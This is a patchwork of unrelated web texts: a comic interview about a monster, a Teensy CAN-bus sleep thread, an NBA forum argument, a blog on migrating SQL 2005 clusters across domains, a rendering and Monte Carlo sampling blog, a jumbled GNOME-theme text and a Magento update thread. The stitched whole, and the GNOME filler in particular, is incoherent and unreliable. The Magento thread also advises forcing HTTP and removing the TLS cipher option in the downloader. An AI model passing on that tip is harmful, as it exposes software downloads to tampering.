DOCTOR MUH: Ok, so where was I... oh yes. As Moomuh was chewing on my arm and Glass was jumping around like a lunatic over his wounded foot, Faiklicence noticed something moving towards us.
I saw it too, it looked like an oversized Avian with forks for arms, ONLY THEY WEREN'T FORKS!!!!!
Interviewer: Ok, um... appearance, check. What did it do?
DOCTOR MUH: IT KILLED MY WHOLE RESEARCH PARTY, THAT'S WHAT IT DID!!!
Interviewer: Mmhm... so HOW did it kill them?
DOCTOR MUH: Using a variety of attacks, of course. It took down Glass as he was flailing about with a pounce attack, which was quite bad news for his fiancée, who is now Mrs. Muh. Teehee... So, continuing, it managed to stun our armed guards by shouting its battlecry, OOKABOOKA!!!!!
Interviewer: What was that? Seemed a bit too loud to come from you...
DOCTOR MUH: SPECIAL EFFECTS!!!!
Interviewer: Um... ok... So, it stunned them?
DOCTOR MUH: Yes! It stunned them and started slashing them apart with its deadly forks! And just when Moomah decided to let go of my arm, it pounced him! My poor little poptop! I managed to get out my trusty little pistol here, it's this one, the one in my hand, and put some lead in it, but just as I wasted the magazine, IT ATE MOOMAH'S CORPSE! It restored its health by feeding on the little monster I planned to mount!
Interviewer: O_O Um, well... do you think any will ever be trained or tamed?
DOCTOR MUH: Possibly, but they are feral beasts; a tamable one will probably be as rare as it is to see one.
Interviewer: Hm.
OOKABOOKA: OOKABOOKA!!!!!
Interviewer: OH MY GOD!!!!
DOCTOR MUH: I GOT IT! *Pulls out Rocket Launcher*
Interviewer: NO! NOT THAT! ANYTHING BUT-
_____________________________________________________________________________________________
OOKABOOKAS HAVE TAKEN OVER THE BROADCAST STATION. YOU ARE NOW WATCHING OOKABOOKA TV
OOKABOOKA: OOKABOOKA OOKABOOKA OOKABOOKA.
OOKABOOKA: OOKABOOKA, OOKABOOKA.
OKKABOOKA: OOKA! OOKABOOKA!
OOKABOOKA: ookabooka...
Thank you for watching OOKA Time, with OOKABOOKA.
CAN-BUS
Hello, I plan to use a Teensy 4.0 as a gateway between two devices in my car. I would like to ask if you plan to implement the CAN bus RX pin as a wake pin, or should I use the digital pin driver? Thank you
Try to use digital.pinMode(23, INPUT, RISING); on your Rx pin (I use CAN1 on the T4). This will work only in hibernate mode. Otherwise, you will need to reinitialise your CAN library upon wakeup from sleep or deepsleep mode. Give that a try and report back.
david, thanks. I am waking the Teensy by the ERR output from the TJA1055. That pin indicates the start of a frame on the bus. My sketch is based on the bidirectional forward example of the FlexCAN library for the T4. Whenever a valid message is received on the "car" side, I preload one variable that decrements every millisecond. Then, when the car goes to sleep, the variable gets to zero, but before it does, I put all three TJA1055s to sleep and then call Snooze.deepSleep(config_teensy40). config_teensy40 has digital and usb loaded. When the "car side" TJA1055 indicates the beginning of a transmission by pulling its ERR pin down, the Teensy wakes up, enables all three TJA1055s and starts forwarding. But sometimes the Teensy gets frozen, at various times after wake up. It never freezes when you power it up, only after wake. The same happens sporadically when I configure an additional pin and put a button on it: the Teensy wakes up and then freezes. The only way to get it running is to unplug power and plug it back again. I need to say that even when the Teensy runs as it should, meaning it does not freeze, when I press the button, it freezes at that moment. I have used MsTimer2, which is ISR-based, to flash an LED to see whether, when the Teensy freezes, my program is stuck somewhere. The MsTimer2 flashing stops too. By the way, when I tried the hibernate sketch hibernate_all_wakeups, I was not able to wake the Teensy. That is why I did not try hibernate, but deepSleep. PSA_GW_NAC_08A.txt
I'm a bit behind in these issues as of late (kids' school things).
I'm hoping to get back to Snooze soon and I'll be taking a look at this.
Many thanks. Maybe if I call detachInterrupt on those two pins, it might help. Then reattach them before entering sleep. I am using Arduino 1.8.9 and Teensyduino 1.5.3. Seems like this approach helped:
`
digital.pinMode(TJA_MASTER_ERR, INPUT, FALLING); // pin, mode, type
digital.pinMode(IN_DEBUG, INPUT_PULLUP, FALLING); // pin, mode, type
Snooze.deepSleep(config_teensy40); // returns module that woke processor
detachInterrupt(digitalPinToInterrupt(TJA_MASTER_ERR));
detachInterrupt(digitalPinToInterrupt(IN_DEBUG));
`
@dufi2profor I'm using the TI SN65HVD230, but I just had a look at the TJA1055 and it looks interesting - do you mind sharing a schematic of how you have it connected to the T4 with the wakeup and sleep functions?
Sure, I will draw the schema in KiCad and share it then. I had been using the MCP2551 in the past, but that one, as part of the high-speed CAN group, has different recessive and dominant states. As a result I found the output on the RX pin inverted. Looked strange to me, and then I looked in my radio (Peugeot 3008) and found this TJA1055. Low speed, fault tolerant, but different idle and dominant states. I would not use control of the sleep functions on those transceivers if I did not want the lowest current possible, and when all three TJAs are "sleeping", it makes the current drop by at least 3 mA in total. So my current setup, when using deepSleep, draws 5 mA, which is okay in a car I think.
Actually, I just saw the 1055 is limited to a 125 Kb/s baud rate. I'll stick with the SN65HVD230 in this case as I need 500 Kb/s. I put the 230 into sleep mode by default and pull the mode pin low when the Teensy is awake to bring it to life. I haven't measured consumption, but I'm hoping for 1-3 mA if not less in hibernate mode.
Yes, that is the only drawback of the TJA, but I need it for my infotainment project in my Peugeot.
I had been using that MCP2551, but only in listen-only mode on my Peugeot "body" CAN, which is running at 500 Kb/s. Here is a schematic diagram of what I have on the breadboard now. SCH_CAN_ISOL_T4.pdf
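For anyone following along, the idle-timeout idea from earlier in the thread (reload a countdown on every valid car-side frame, decrement it each millisecond, sleep at zero) can be sketched as a tiny simulation. This is Python rather than the actual Arduino sketch; the class name and the timeout value are made up, and on real hardware the tick would be an ISR and going to sleep would mean disabling the TJA1055s and calling Snooze.deepSleep:

```python
class GatewaySleepTimer:
    """Toy model of the CAN gateway's go-to-sleep logic described above.
    The 5000 ms default is illustrative, not the poster's actual value."""

    def __init__(self, timeout_ms=5000):
        self.timeout_ms = timeout_ms
        self.remaining = timeout_ms
        self.asleep = False

    def on_valid_frame(self):
        # A valid message on the car side reloads the countdown and
        # (on real hardware) would re-enable the transceivers.
        self.remaining = self.timeout_ms
        self.asleep = False

    def on_millisecond_tick(self):
        # Called once per millisecond (an ISR on the real Teensy).
        if not self.asleep and self.remaining > 0:
            self.remaining -= 1
            if self.remaining == 0:
                self.asleep = True  # sleep transceivers, then deepSleep()

timer = GatewaySleepTimer(timeout_ms=3)
for _ in range(2):
    timer.on_millisecond_tick()
assert not timer.asleep
timer.on_valid_frame()           # traffic arrives: countdown reloads
for _ in range(3):
    timer.on_millisecond_tick()
assert timer.asleep              # bus idle long enough: time to sleep
```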
Serious question? Is this Micheal Olowakandi.
Originally posted by FatDaddy:
Yes. Of course by stats. When he plays defense, he doesn't want to get close to the opponents because he wanted to protect himself. At this moment his stats are more important than wins. Clippers lost because Brand and Miller suck.
Yea, Miller and Brand suck. How long did it take you to come up with that one?
Originally posted by THE'clip'SHOW:
Serious question? Is this Micheal Olowakandi. You should be practicing right now! and I hope you enjoy the humidity in Miami.
PLEASE IGNORE,
Originally posted by FatDaddy:
According to ESPN.com, Kandi is the 2nd best center. Coach Gently compared him with Wilt. If you guys read the articles, you will understand he is worth $20 Million/year. All of us should believe the experts in ESPN.com. What is the Clippers problem? Can I say all of the wins belong to Kandi and all of the losses belong to Brand and Miller......?
That's a nice way of saying Kandi isn't and most likely never will be close to Wilt.
Originally posted by FatDaddy:
Copy from ESPN.com: "I think he will continue to work at it and get better," Clippers coach Alvin Gentry said. "If you are asking me is he going to get better than Wilt Chamberlain, I don't know. But I think he is going to be a very effective player in this league for a lot of years."
I don't think he is worth $20M but most teams would be glad to take him for $20. Even if he was, the CBA won't allow him to get 20M a year. The max on a 7 year deal for a player of Kandi's experience is around 100M total, isn't it?
Originally posted by FatDaddy:
Copy from ESPN.com: It seems inconceivable that the Clippers would allow Olowokandi to escape, given his recent production and what could be his future production. But stranger things have happened. And, in a world where it seems Jason Kidd is likely to remain in New Jersey and Tim Duncan is likely to stay in San Antonio, the next-best free agent is the next-best center.
next-best free agent (Kandi) is the next-best center.
Here is my response: best center, worth $20/year.
Originally posted by JoeF:
,,, most teams would be glad to take him for $20
I mean, how good can coach 'Gently' be if you don't even know his name?
Originally posted by FatDaddy:
ESPN.com's rating on Kandi is the most ridiculous ever in NBA history. Why Jeff Van Gundy? They have Gently now. Let me tell you, the Clippers have nobody better than Payton or Lewis and nobody better than Yao or Francis. All Clippers starters are overrated!!!!!
We're moving our Dev environment to a new domain for some unfathomable corporate reason, and it's going to be a major headache. Among our 20+ SQL Servers in the environment, we've got a few SQL 2005 clusters. According to Microsoft, we can't move them without uninstalling SQL. Needless to say, this would add more pain to the migration process. It wouldn't be the end of the world, but this is weekend work, and uninstalling and re-installing a couple active/active SQL clusters is just the thing to turn 1 day of work into 2+. However, I think they're wrong. I built two virtual machines on VMWare Server, added them to a cluster (see Repeatable Read for instructions on creating shared disks in VMWare) on our current domain, and created some databases. Verified failover capability and connectivity. Then I moved both nodes to the new domain using the following steps:
1) Take all cluster resources offline (except the quorum, which cannot be taken offline)
2) Stop the cluster service on both nodes
3) Change the cluster service startup type to Manual
4) Change the domain of each machine to the new domain and reboot
5) After reboot, on each machine, change the cluster and SQL service accounts to accounts in the new domain
6) Run gpedit.msc or otherwise access Local Security Policy Settings (see below), and grant the following rights:
Cluster Service Account:
- Act as part of the operating system
- Adjust memory quotas for a process
- Increase scheduling priority
- Manage auditing and security log
- Restore files and directories
SQL Service Account:
- Adjust memory quotas for a process
- Lock pages in memory
- Log on as a batch job
- Log on as a service
- Replace a process level token
7) Add the cluster and SQL service accounts to the local Administrators group. NOTE: This should not be necessary for SQL, and I will update this with the minimum required permissions as soon as I sort them out. It is necessary for the cluster account, however.
8) Start the cluster service on both machines
9) Bring cluster resources online
10) Go enjoy the rest of your weekend
If you missed some permissions, the cluster service will likely fail to start with an error 7023 or 1321, and will helpfully output an error in the system log with eventId 1234 that contains a list of the necessary user rights that still need to be assigned. Now that's error reporting! Comprehensive testing is still pending, but the preliminary results look good. After this process, SQL Server comes online on my test cluster, as do SQL Agent and Fulltext. I don't have any machines on the new domain with SQL Management Studio installed, but I could connect to SQL using osql directly on one of the cluster nodes. If anyone out there has any different experiences or comments, I'd love to hear them. My previous post left out one small but significant detail: the domain groups under which the SQL Server service accounts run. When one installs SQL 2005 on a cluster, the setup program requires domain groups to be entered for each service account. So for example:
SQL Server service account: OLDDOMAIN\SQLService
SQL Agent service account: OLDDOMAIN\SQLAgentService
SQL Browser service account: OLDDOMAIN\SQLBrowserService
Then it comes time to move your cluster, and you've followed my steps above or done your own hacking, and you've changed the service accounts to NEWDOMAIN\SQLService and so on. But the domain groups remain the same. Your cluster will come online and fail over and operate fine, but you won't be able to change it. This was made evident when I tried to add a node to an existing cluster after moving it to a new domain. It gave me a message like "Cannot add NEWDOMAIN\SQLService to OLDDOMAIN\SQLServiceGroup." Arrgh. Microsoft had already claimed that this was not supported, so I suppose I shouldn't have been surprised. So I started searching for the reference to OLDDOMAIN\SQLServiceGroup. And couldn't find it.
Not in a config file, or a system table (I know, that was dumb, but I was desperate), or the registry, where I expected to find it. Eventually, I started combing the registry key by key within the SQL hives and came across this in HKLM\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL.1\Setup... (okay, I tried to upload another image here to illustrate, but Blogger hates me, so screw it.) The keys AGTGroup, FTSGroup, and SQLGroup contain the SIDs for whatever OLDDOMAIN groups you set up when installing SQL. Find the SIDs for your new domain groups (the VBScript below is how I did it), enter those in place of the old ones, restart SQL, and your cluster is moved. You should now be able to add or remove nodes, install hotfixes, etc. You'll need to update the SIDs for each SQL installation (MSSQL.2, MSSQL.3, etc.). As with any unsupported operation, your mileage may vary, but let me know if you have a different experience with this or you run into additional problems.
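One last tip: before writing a SID into AGTGroup, FTSGroup, or SQLGroup, it's worth sanity-checking the string. The checker below is a purely illustrative Python helper, not part of any SQL tooling; it only validates the general S-1-... shape of a SID string, it does not look anything up in the domain:

```python
import re

# Windows SID strings look like S-1-5-21-<subauth>-<subauth>-<subauth>-<rid>.
# This regex only checks the general S-<revision>-<authority>-<subauths> shape.
SID_PATTERN = re.compile(r"^S-1-\d+(-\d+){1,15}$")

def looks_like_sid(value):
    """Rough format check for a SID string before pasting it into
    AGTGroup/FTSGroup/SQLGroup under the MSSQL.n\\Setup registry key."""
    return bool(SID_PATTERN.match(value))

assert looks_like_sid("S-1-5-21-1111111111-2222222222-3333333333-1001")
assert not looks_like_sid("NEWDOMAIN\\SQLServiceGroup")  # a name, not a SID
```

It won't save you from pasting the SID of the wrong group, but it will catch the easy mistake of pasting the group name instead of its SID.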
After succumbing to a bit of a slump in research productivity over the last week or two it feels great to be making progress again. Finally I have a fully functional implementation of Bidirectional path tracing with some basic multiple importance sampling for the path weights. To celebrate having this new renderer in the code base I decided to have another crack at implementing a ceramic like shader. In the past I had modeled this material in geometry by placing a diffuse textured sphere inside an ever so slightly larger glass sphere to model the glaze/polish of the material. However, this method was a clunky approximation and severely limited the complexity of the models which it could be applied to. This time I modeled a blended BRDF between a lambertian diffuse under-layer and an anisotropic glossy over-layer to represent the painted ceramic glaze. The amount of each BRDF used for each interaction is modulated by a Fresnel term on the incident direction. This means that looking straight at the surface will show mostly the coloured under-layer, while looking at glancing angles will show mostly the glossy over-layer. The final, most important, part of this shader however is the bump map applied to it. Originally I rendered this scene without bump mapping, and while the material seemed plausible it looked almost too perfect. By breaking up the edges of reflections and allowing the surface of the material to “grab” onto a bit more light, the bump map makes the material an order of magnitude more convincing. Just a quick render after implementing an Anisotropic Metal material in my renderer. The test scene was inspired by one I saw on Kevin Beason’s worklog blog. Pressing onwards with research after a short break to play with the Xeon Phi rack, I’ve been working on visualizations for Monte Carlo Simulations.
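The Fresnel-modulated blend described above for the ceramic shader can be sketched in a few lines. This assumes Schlick's approximation and an index of refraction of 1.5 for the glaze, neither of which is stated above, so treat it as one plausible realization rather than the renderer's actual code:

```python
import math

def schlick_fresnel(cos_theta, ior=1.5):
    """Schlick's approximation of Fresnel reflectance at a dielectric
    interface (an assumed choice; the post doesn't say which Fresnel
    term it uses)."""
    r0 = ((ior - 1.0) / (ior + 1.0)) ** 2
    return r0 + (1.0 - r0) * (1.0 - cos_theta) ** 5

def ceramic_blend_weight(cos_theta):
    """Returns (diffuse_weight, glossy_weight) for the ceramic BRDF:
    head-on views favour the coloured under-layer, glancing angles the
    glossy glaze over-layer."""
    f = schlick_fresnel(cos_theta)
    return 1.0 - f, f

# Looking straight at the surface: mostly the diffuse under-layer.
d, g = ceramic_blend_weight(cos_theta=1.0)   # roughly 0.96 diffuse at IOR 1.5
# Glancing angle: the glossy glaze dominates.
d2, g2 = ceramic_blend_weight(cos_theta=0.05)
```

Because the two weights always sum to one, the blend conserves energy as long as each component BRDF does.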
My aim is to have a clean and concise means of displaying (and therefore being able to infer relationships from) the data of higher dimensional probability distributions. The video below shows one such visualization where a 2D Gaussian PDF has been simulated using Hamiltonian Dynamics. The two 3D meshes represent the reconstructed sample volume as a 2D histogram of values rescaled to the original function. The error between the reconstruction and the original curves is shown through the colour of the surface, where hot spots denote areas of high error. The mean squared error for the whole distribution is displayed in the top right on a logarithmic scale. An algorithm which converges in an ideal manner will graph its error as a straight line on the log scale. The sample X and Y graphs in the bottom right allow us to visualize where the samples are being chosen as the simulation runs and infer whether samples are being chosen independently of one another. The centre-bottom graph simply gives us a trajectory of samples over the course of the simulation. This additionally allows us to catch if an algorithm is prone to getting stuck in local maxima. The above video shows the same simulation run with a basic Metropolis Hastings algorithm. Here the proposal sample y attributes are chosen independently of one another, meaning this is not a Gibbs Sampler, although I intend to implement one within the test framework for comparison's sake soon. A key difference between the two simulations here is to note the Path Space Trajectory shown in the bottom-centre graph and how it relates to the Sample Dimension Space graphs shown on the middle & bottom-right. Hamiltonian Dynamics chooses sets of variables where the y elements are highly dependent on one another within a coordinate, yet almost entirely independent of other pairs of coordinates within the Path Space.
Metropolis Hastings, on the other hand, chooses coordinate pairs entirely independently of one another, and values within each dimension of the Path Space that are highly dependent on one another. These characteristics of the Metropolis sampler are undesirable, which is why adding a dependency within coordinate pairs (Gibbs Sampling) helps to accelerate multi-dimensional Metropolis Samplers. It's been a couple of weeks since I stopped working directly on rendering and took some time to read up on a topic called Hamiltonian (Hybrid) Monte Carlo, which is to be the main focus of my research for the foreseeable future. Hamiltonian Monte Carlo comes from a physics term of the same genesis called Hamiltonian Dynamics. The general idea being that, like with a Lagrangian equation for a system, you find a way to model the energy of a system which allows you to estimate it efficiently even when the system is highly dimensional. With a Lagrangian you aim to minimize the degrees of freedom to reduce computation, and similarly with a Hamiltonian you reduce the problem to a measure of the system's kinetic K(p) and potential U(x) energy. This allows you to describe the entire state of an arbitrarily dimensional system as the sum of these measures, i.e. H(x,p) = U(x) + K(p). Above is our faithful companion, Metropolis Hastings Monte Carlo (MHMC), simulating a Normal distribution with mean μ and variance 3. The simulation was run for 10,000 samples yielding the shown results. Some things worth noting here are features such as the Error curve (Orange), which varies dramatically as the simulation progresses. This is in part due to the nature of the Random Walk which MHMC takes through the integration space, which can be seen in the Blue graph to the bottom left. It is clear from the Blue graph that two states x' in the Markov Chain are tightly dependent on one another.
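The MHMC simulation described above boils down to very little code. Here is a minimal random-walk Metropolis-Hastings sampler targeting a Normal; the mean of 0, the proposal step size, and the sample count are illustrative assumptions, not the values used in the actual simulations:

```python
import math, random

def mh_normal(n_samples, mean=0.0, var=3.0, step=1.0, seed=1):
    """Random-walk Metropolis-Hastings targeting N(mean, var). With a
    symmetric Gaussian proposal, the acceptance probability reduces to
    the ratio of target densities."""
    rng = random.Random(seed)
    log_target = lambda x: -((x - mean) ** 2) / (2.0 * var)
    x = mean  # start at the mode for simplicity
    samples = []
    for _ in range(n_samples):
        proposal = x + rng.gauss(0.0, step)
        # Accept with probability min(1, p(proposal) / p(x)).
        log_ratio = log_target(proposal) - log_target(x)
        if rng.random() < math.exp(min(0.0, log_ratio)):
            x = proposal
        samples.append(x)  # on rejection, the old state is repeated
    return samples

xs = mh_normal(20_000)
est_mean = sum(xs) / len(xs)
est_var = sum((x - est_mean) ** 2 for x in xs) / len(xs)
```

The repeated states on rejection are exactly what produces the tight dependence between consecutive samples visible in the Blue graph.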
Next we see the same Normal distribution used above, estimated this time using Hamiltonian Monte Carlo (HMC) with trajectory length 20 and step size 0.07. Comparing this to our previous simulation using MHMC, several things become apparent. Firstly, the Error curve (Orange) seems to decay in a much more controlled and systematic manner. As opposed to the Error for MHMC, which was erratic due to the nature of a Random Walk, here we see the benefit of making an informed choice as to where to place the next sample. From this we can hypothesise that an optimally tuned HMC simulation will in general reduce the error of the simulation consistently with more samples, with little chance of introducing large, random errors as with MHMC. Additionally, in the sample placement graph (Blue) we see that the relationship between two states x' is far more abstracted, meaning two samples, while being related and forming a valid Markov Chain, will not reduce the accuracy of the simulation by treading on each other's turf. There is, however, an issue with the above HMC simulation. Tuning. Unless properly tuned for the specific problem, the Hyper-parameters for the Trajectory length L and Step size E will simply not work as intended and will yield poor results. Above is a second run of the HMC simulation, this time with trajectory length 10 and step size 0.05. Because the length of the Leapfrog Trajectory was not sufficient to allow the system to move to an independent state, we see the same banding of samples in the sample frequency graph (Blue) as we saw in the original Metropolis simulation. Additionally, because of the dependent nature of the samples, a similar pattern is seen in the Error curve (Orange), where the curve has large peaks where error was reintroduced to the system, like with a Random Walk. It is therefore vital to optimally tune HMC as the computation for each sample is an order of magnitude larger than with MHMC.
Without proper tuning, it's much better to stick with the easier-to-tune MHMC.
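For reference, the leapfrog trajectory at the heart of HMC can be sketched as follows, using the trajectory length 20 and step size 0.07 mentioned above. Everything else here is assumed for illustration: a 1-D target with mean 0, a unit mass matrix, and made-up sample counts:

```python
import math, random

def hmc_step(x, log_prob, grad_log_prob, L=20, eps=0.07, rng=random):
    """One HMC transition: draw a momentum, integrate Hamilton's
    equations with L leapfrog steps of size eps, then accept/reject on
    the total energy H(x, p) = U(x) + K(p), where U = -log p and
    K = p^2 / 2 (1-D, unit mass)."""
    p = rng.gauss(0.0, 1.0)
    x_new, p_new = x, p
    p_new += 0.5 * eps * grad_log_prob(x_new)    # first half-step for momentum
    for i in range(L):
        x_new += eps * p_new                     # full step for position
        if i != L - 1:
            p_new += eps * grad_log_prob(x_new)  # full step for momentum
    p_new += 0.5 * eps * grad_log_prob(x_new)    # final half-step for momentum
    h_old = -log_prob(x) + 0.5 * p * p
    h_new = -log_prob(x_new) + 0.5 * p_new * p_new
    # Metropolis correction for the leapfrog discretization error.
    if rng.random() < math.exp(min(0.0, h_old - h_new)):
        return x_new
    return x

# Illustrative target: a Normal with mean 0 (assumed) and variance 3.
var = 3.0
log_prob = lambda x: -x * x / (2.0 * var)
grad_log_prob = lambda x: -x / var

rng = random.Random(7)
x, samples = 0.0, []
for _ in range(5000):
    x = hmc_step(x, log_prob, grad_log_prob, rng=rng)
    samples.append(x)
```

Shrinking L and eps in this sketch reproduces the failure mode described above: trajectories too short to decorrelate consecutive states.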
Once this is done, all you have to do is click on the install links on gnome- and then click "OK" and the themes will be installed in ~/.themes. Restart the Tweaks tool and your new themes should be available. Tested on Debian. It used to be very easy to install custom themes in Gnome 2, but if you have upgraded to Gnome Shell, particularly in Ubuntu Oneiric, you will find that there are not many customization options available for you. While Gnome Shell supports theming, there doesn't seem to be an option for you to switch to a different theme. You can install these themes on all versions of Ubuntu and Ubuntu-based distros, Arch Linux and Arch Linux based distros, Elementary OS, Debian 8, Fedora 21-24, and OpenSUSE. All other distros based on these mentioned Linux platforms should not have any problem installing this icon theme. Installing Gnome 3.20 in Ubuntu and Linux Mint: for you to be able to install Gnome 3.20 on Ubuntu 16.04 or its derivatives such as Linux Mint 17, you will need to add the GNOME staging repository using the commands below. The brave, fearless volunteers behind Ubuntu GNOME are very happy to announce the official release of Ubuntu GNOME 16.04 LTS, supported for 3 years. Every part of GNOME 3 has been designed to make it simple and easy to use. The Activities Overview is an easy way to access all your basic tasks. A press of a button is all it takes to view your open windows, launch applications or check if you have new messages. Having everything in one place is convenient and means that you don't have to learn your way around a maze of different technologies. 31/10/2017: Since Ubuntu 17.10 has changed the default desktop environment to GNOME, it is slightly different to change themes in the new version. material-black COLORS is a new GTK, xfwm4, GNOME Shell, and Cinnamon Dark Mode theme with matching icons and folders.
The material-black COLORS theme is based on Material Design standards and aims to bring a warm, colorful, and elegant experience to your desktop.

With GNOME 3.16, a new logo, and a new Ubiquity slideshow, the Ubuntu GNOME team is very happy to announce the release of Ubuntu GNOME 15.10 Wily Werewolf. Ubuntu GNOME is an official flavor of Ubuntu, featuring the GNOME desktop environment.

I have been trying to install this theme for the last couple of hours, but I just don't get it. I just started out with Linux the other day, so I am fumbling around in the dark as well.

We have received many emails from users asking for an article about GNOME 3 desktop customization, but we didn't have time to write on this topic. I had been using Ubuntu on my primary laptop for a long time and got bored, so I wanted to test some other distro related to Arch Linux.

10/03/2017 · Welcome back to P&T! Today's video is about customizing Ubuntu GNOME the way I do it. I didn't really have editing time, so sorry for the pauses; this was the first video I've done in a while.

List of top Ubuntu themes: the top 17 best themes for Ubuntu 18.04 LTS — flat themes, icon themes, and more.

As a result, a lot of GNOME theme developers work really hard to turn the Shell into a complete, themed experience. Since GNOME Shell has so many themes, in this list we'll go over the 8 best GNOME Shell themes, where to get them, and how to use them.

To change the GTK theme in GNOME 3, with or without GNOME Shell, you can use GNOME Tweak Tool, which is available in the GNOME 3 Ubuntu PPA and the official Ubuntu 11.10 and Fedora 15 repositories. This quick tutorial shows GNOME desktop beginners how to enable the 'Shell theme' drop-down box in the GNOME Tweak Tool.
The Gnome Tweak Tool, a.k.a. GNOME Tweaks, is a customization console for the GNOME 3 desktop. It provides many options not available in the normal settings panel. Most of the settings are visual, which allows you to customize the look and feel of GNOME. There are also extensions that let you add new functionality.

10 best GTK themes for Ubuntu 18.04: flat themes, icon themes, and desktop themes for Ubuntu 18.04 LTS.

Nordic is currently ranked the 10th most popular GTK3 theme. This article shows off the theme's beauty and explains how to install every component on Ubuntu 18.04.

Please note that it is no longer required to copy the theme to ~/.themes/ for the Mutter theme to work (tested on Fedora 15 and Ubuntu Natty 11.04 with all packages up to date). After changing the Mutter theme, remember to reload GNOME Shell (Alt+F2, then enter "r") or log out.

In Ubuntu there is already another theme besides the Ubuntu theme: the freedesktop theme, which comes as a DEB package. You can tick it in Synaptic. First solution, the Debian package: let's say the freedesktop deb is the beginner's deb, so that they at least have an easy choice between two themes.

07/09/2017 · However, a "Classic" desktop built upon GNOME 3 is still available. Installation: install the gnome-session-fallback package from the universe repository, log out, and choose GNOME Classic at the login screen. The only remaining supported Ubuntu release that provides the gnome-session-fallback package is Ubuntu 12.04 Precise Pangolin.

Your donation will ensure that GNOME continues to be a free and open source desktop by providing resources to developers, software and education for end users, and promotion for GNOME worldwide. The GNOME Project is a diverse international community involving hundreds of contributors.
We thus find GNOME 3.16, in part, since Ubuntu prefers proven versions and refuses to ship the latest GNOME release. "In part" because some applications, such as Files or Online Accounts, are only available in version 3.14.

This script installs the latest git versions of some fine GNOME themes into the current user's ~/.themes folder. Run the script again whenever you want the latest theme updates; many of these themes are updated frequently with bugfixes and enhancements. It supports GNOME versions 3.22 and above.

Arc is a flat theme with transparent elements for GTK 3, GTK 2, and GNOME Shell, and it supports GTK 3 and GTK 2 based desktop environments.

19/09/2012 · This guide is written for Ubuntu 12.04 LTS, a five-year-support release. With the removal of support in 12.10 for Unity 2D and Metacity, the future of the GNOME Classic option looks doubtful. Therefore this wiki cannot be guaranteed to work on any later version of Ubuntu; it may work, but proceed at your own risk!
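The manual route described throughout (dropping a theme into ~/.themes and applying it with Tweaks or from the command line) boils down to something like the sketch below. The theme name "Flat-Remix" and the archive path are placeholders, not specific recommendations:

```shell
# Hedged sketch of a per-user theme install; the archive name/path are
# hypothetical stand-ins for whatever theme you downloaded.
set -e
mkdir -p "$HOME/.themes" "$HOME/.icons"

# Unpack a downloaded theme archive into ~/.themes (skipped if absent).
if [ -f "$HOME/Downloads/Flat-Remix.zip" ]; then
    unzip -o "$HOME/Downloads/Flat-Remix.zip" -d "$HOME/.themes"
fi

# Apply it from the command line when gsettings is available; otherwise
# use the Tweaks tool's Appearance pane as described above.
if command -v gsettings >/dev/null 2>&1; then
    gsettings set org.gnome.desktop.interface gtk-theme "Flat-Remix" || true
fi
echo "themes dir ready: $HOME/.themes"
```

After this, restarting the Tweaks tool should make the new theme selectable.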
Magento Update: There is no Mage_All_Latest in Magento Connect?

I want to update my Magento <IP_ADDRESS> over Magento Connect, BUT there are only the installed extensions listed. No Magento entries, not even Mage_All_Latest. So I followed some tips from this forum and tried to install Mage_All_Latest, but every time I get errors that the files already exist. So how can I install Mage_All_Latest (and/or update my Magento)? I hope I don't have to rebuild my whole site.

can you send the error screenshot

As you see: no magento files... so I tried to install Mage_All_Latest with this code: http://connect20.magentocommerce.com/community/Mage_All_Latest Then, after Magento worked, I got the following log:

Checking dependencies of packages
Already installed: community/Interface_Frontend_Rwd_Default <IP_ADDRESS>, skipping
Already installed: community/Mage_Locale_en_US <IP_ADDRESS>, skipping
Already installed: community/Lib_Unserialize <IP_ADDRESS>, skipping
Already installed: community/Lib_IDNA2 <IP_ADDRESS>, skipping
CONNECT ERROR: Package 'Mage_All_Latest' is invalid '.\pkginfo\Mage_All_Latest.txt' already exists
Package 'Interface_Adminhtml_Default' is invalid './app/design\adminhtml\default\default\etc\theme.xml' already exists
Package 'Interface_Frontend_Default' is invalid './app/design\frontend\default\default\etc\theme.xml' already exists
Package 'Interface_Install_Default' is invalid './app/design\install\default\default\etc\theme.xml' already exists
... and so on

so you are not getting magento packages right?
Please follow the steps below: copy the var/package folder from a default Magento <IP_ADDRESS> and paste it into your Magento var/, then delete the pkginfo/Mage_All_Latest.txt file. If after this you are still not getting upgrade options, go to downloader/lib/Mage/HTTP/Client/Curl.php and find this line:

$uriModified = $this->getModifiedUri($uri, $https);

Before this line write:

$https = false;

And comment out this line:

$this->curlOption(CURLOPT_SSL_CIPHER_LIST, 'TLSv1');

please try this and let me know the progress, thanks

Yes, this will be useful.

hi, sorry, I wasn't at the PC... first, thanks for your tips... what do you mean with default Magento? do you mean the "fresh"/"naked" Magento before any theme and so on? it went great, I have the options now... but sadly it conflicts now:

Checking dependencies of packages
Installing package community/Phoenix_Moneybookers <IP_ADDRESS>
Package community/Phoenix_Moneybookers <IP_ADDRESS> installed successfully
Already installed: community/Mage_Locale_en_US <IP_ADDRESS>, skipping
Already installed: community/Lib_Unserialize <IP_ADDRESS>, skipping
Already installed: community/Lib_IDNA2 <IP_ADDRESS>, skipping
Package upgraded: community Phoenix_Moneybookers <IP_ADDRESS>
CONNECT ERROR: Package community/Mage_Core_Modules <IP_ADDRESS> conflicts with: community/Interface_Frontend_Base_Default <IP_ADDRESS>,
Package community/Lib_Js_Mage <IP_ADDRESS> conflicts with: community/Mage_Core_Modules <IP_ADDRESS>
Package community/Lib_Phpseclib <IP_ADDRESS> conflicts with: community/Mage_Core_Modules <IP_ADDRESS>
Package community/Lib_Mage <IP_ADDRESS> conflicts with: community/Mage_Core_Modules <IP_ADDRESS>

did you delete the pkginfo/Mage_All_Latest.txt file before starting the upgrade?

yes, it was deleted.
:-( tried it again today, but every time the same error appears (new module <IP_ADDRESS> conflicts with <IP_ADDRESS> [CONNECT ERROR]) => e.g. CONNECT ERROR: Package community/Lib_Credis <IP_ADDRESS> conflicts with: community/Mage_Core_Modules <IP_ADDRESS>

IT WORKS!!! I found the mistake: only Mage_All_Latest was already at <IP_ADDRESS>, so I uninstalled it back to <IP_ADDRESS> and started the update again... now I am on <IP_ADDRESS>! thanks for your help Raghu! :-)

the only thing now: some CMS pages (e.g. business terms) are empty now - do you know what is going on there? (I use MageSetup)

can you send me the frontend link

sadly it is at the moment on my localhost with WampServer :-(

ok np.. no cms page will be affected when an upgrade is done.. please clear the cache and session once and check

...I read something about the blocks of MageSetup needing extra permissions after a Magento update in System => Permissions => Blocks, did you hear of that? how can I set these permissions?

all block types will already be there in permissions. If your custom block type is not present at that location you have to add a new block and save it as allowed, that's it

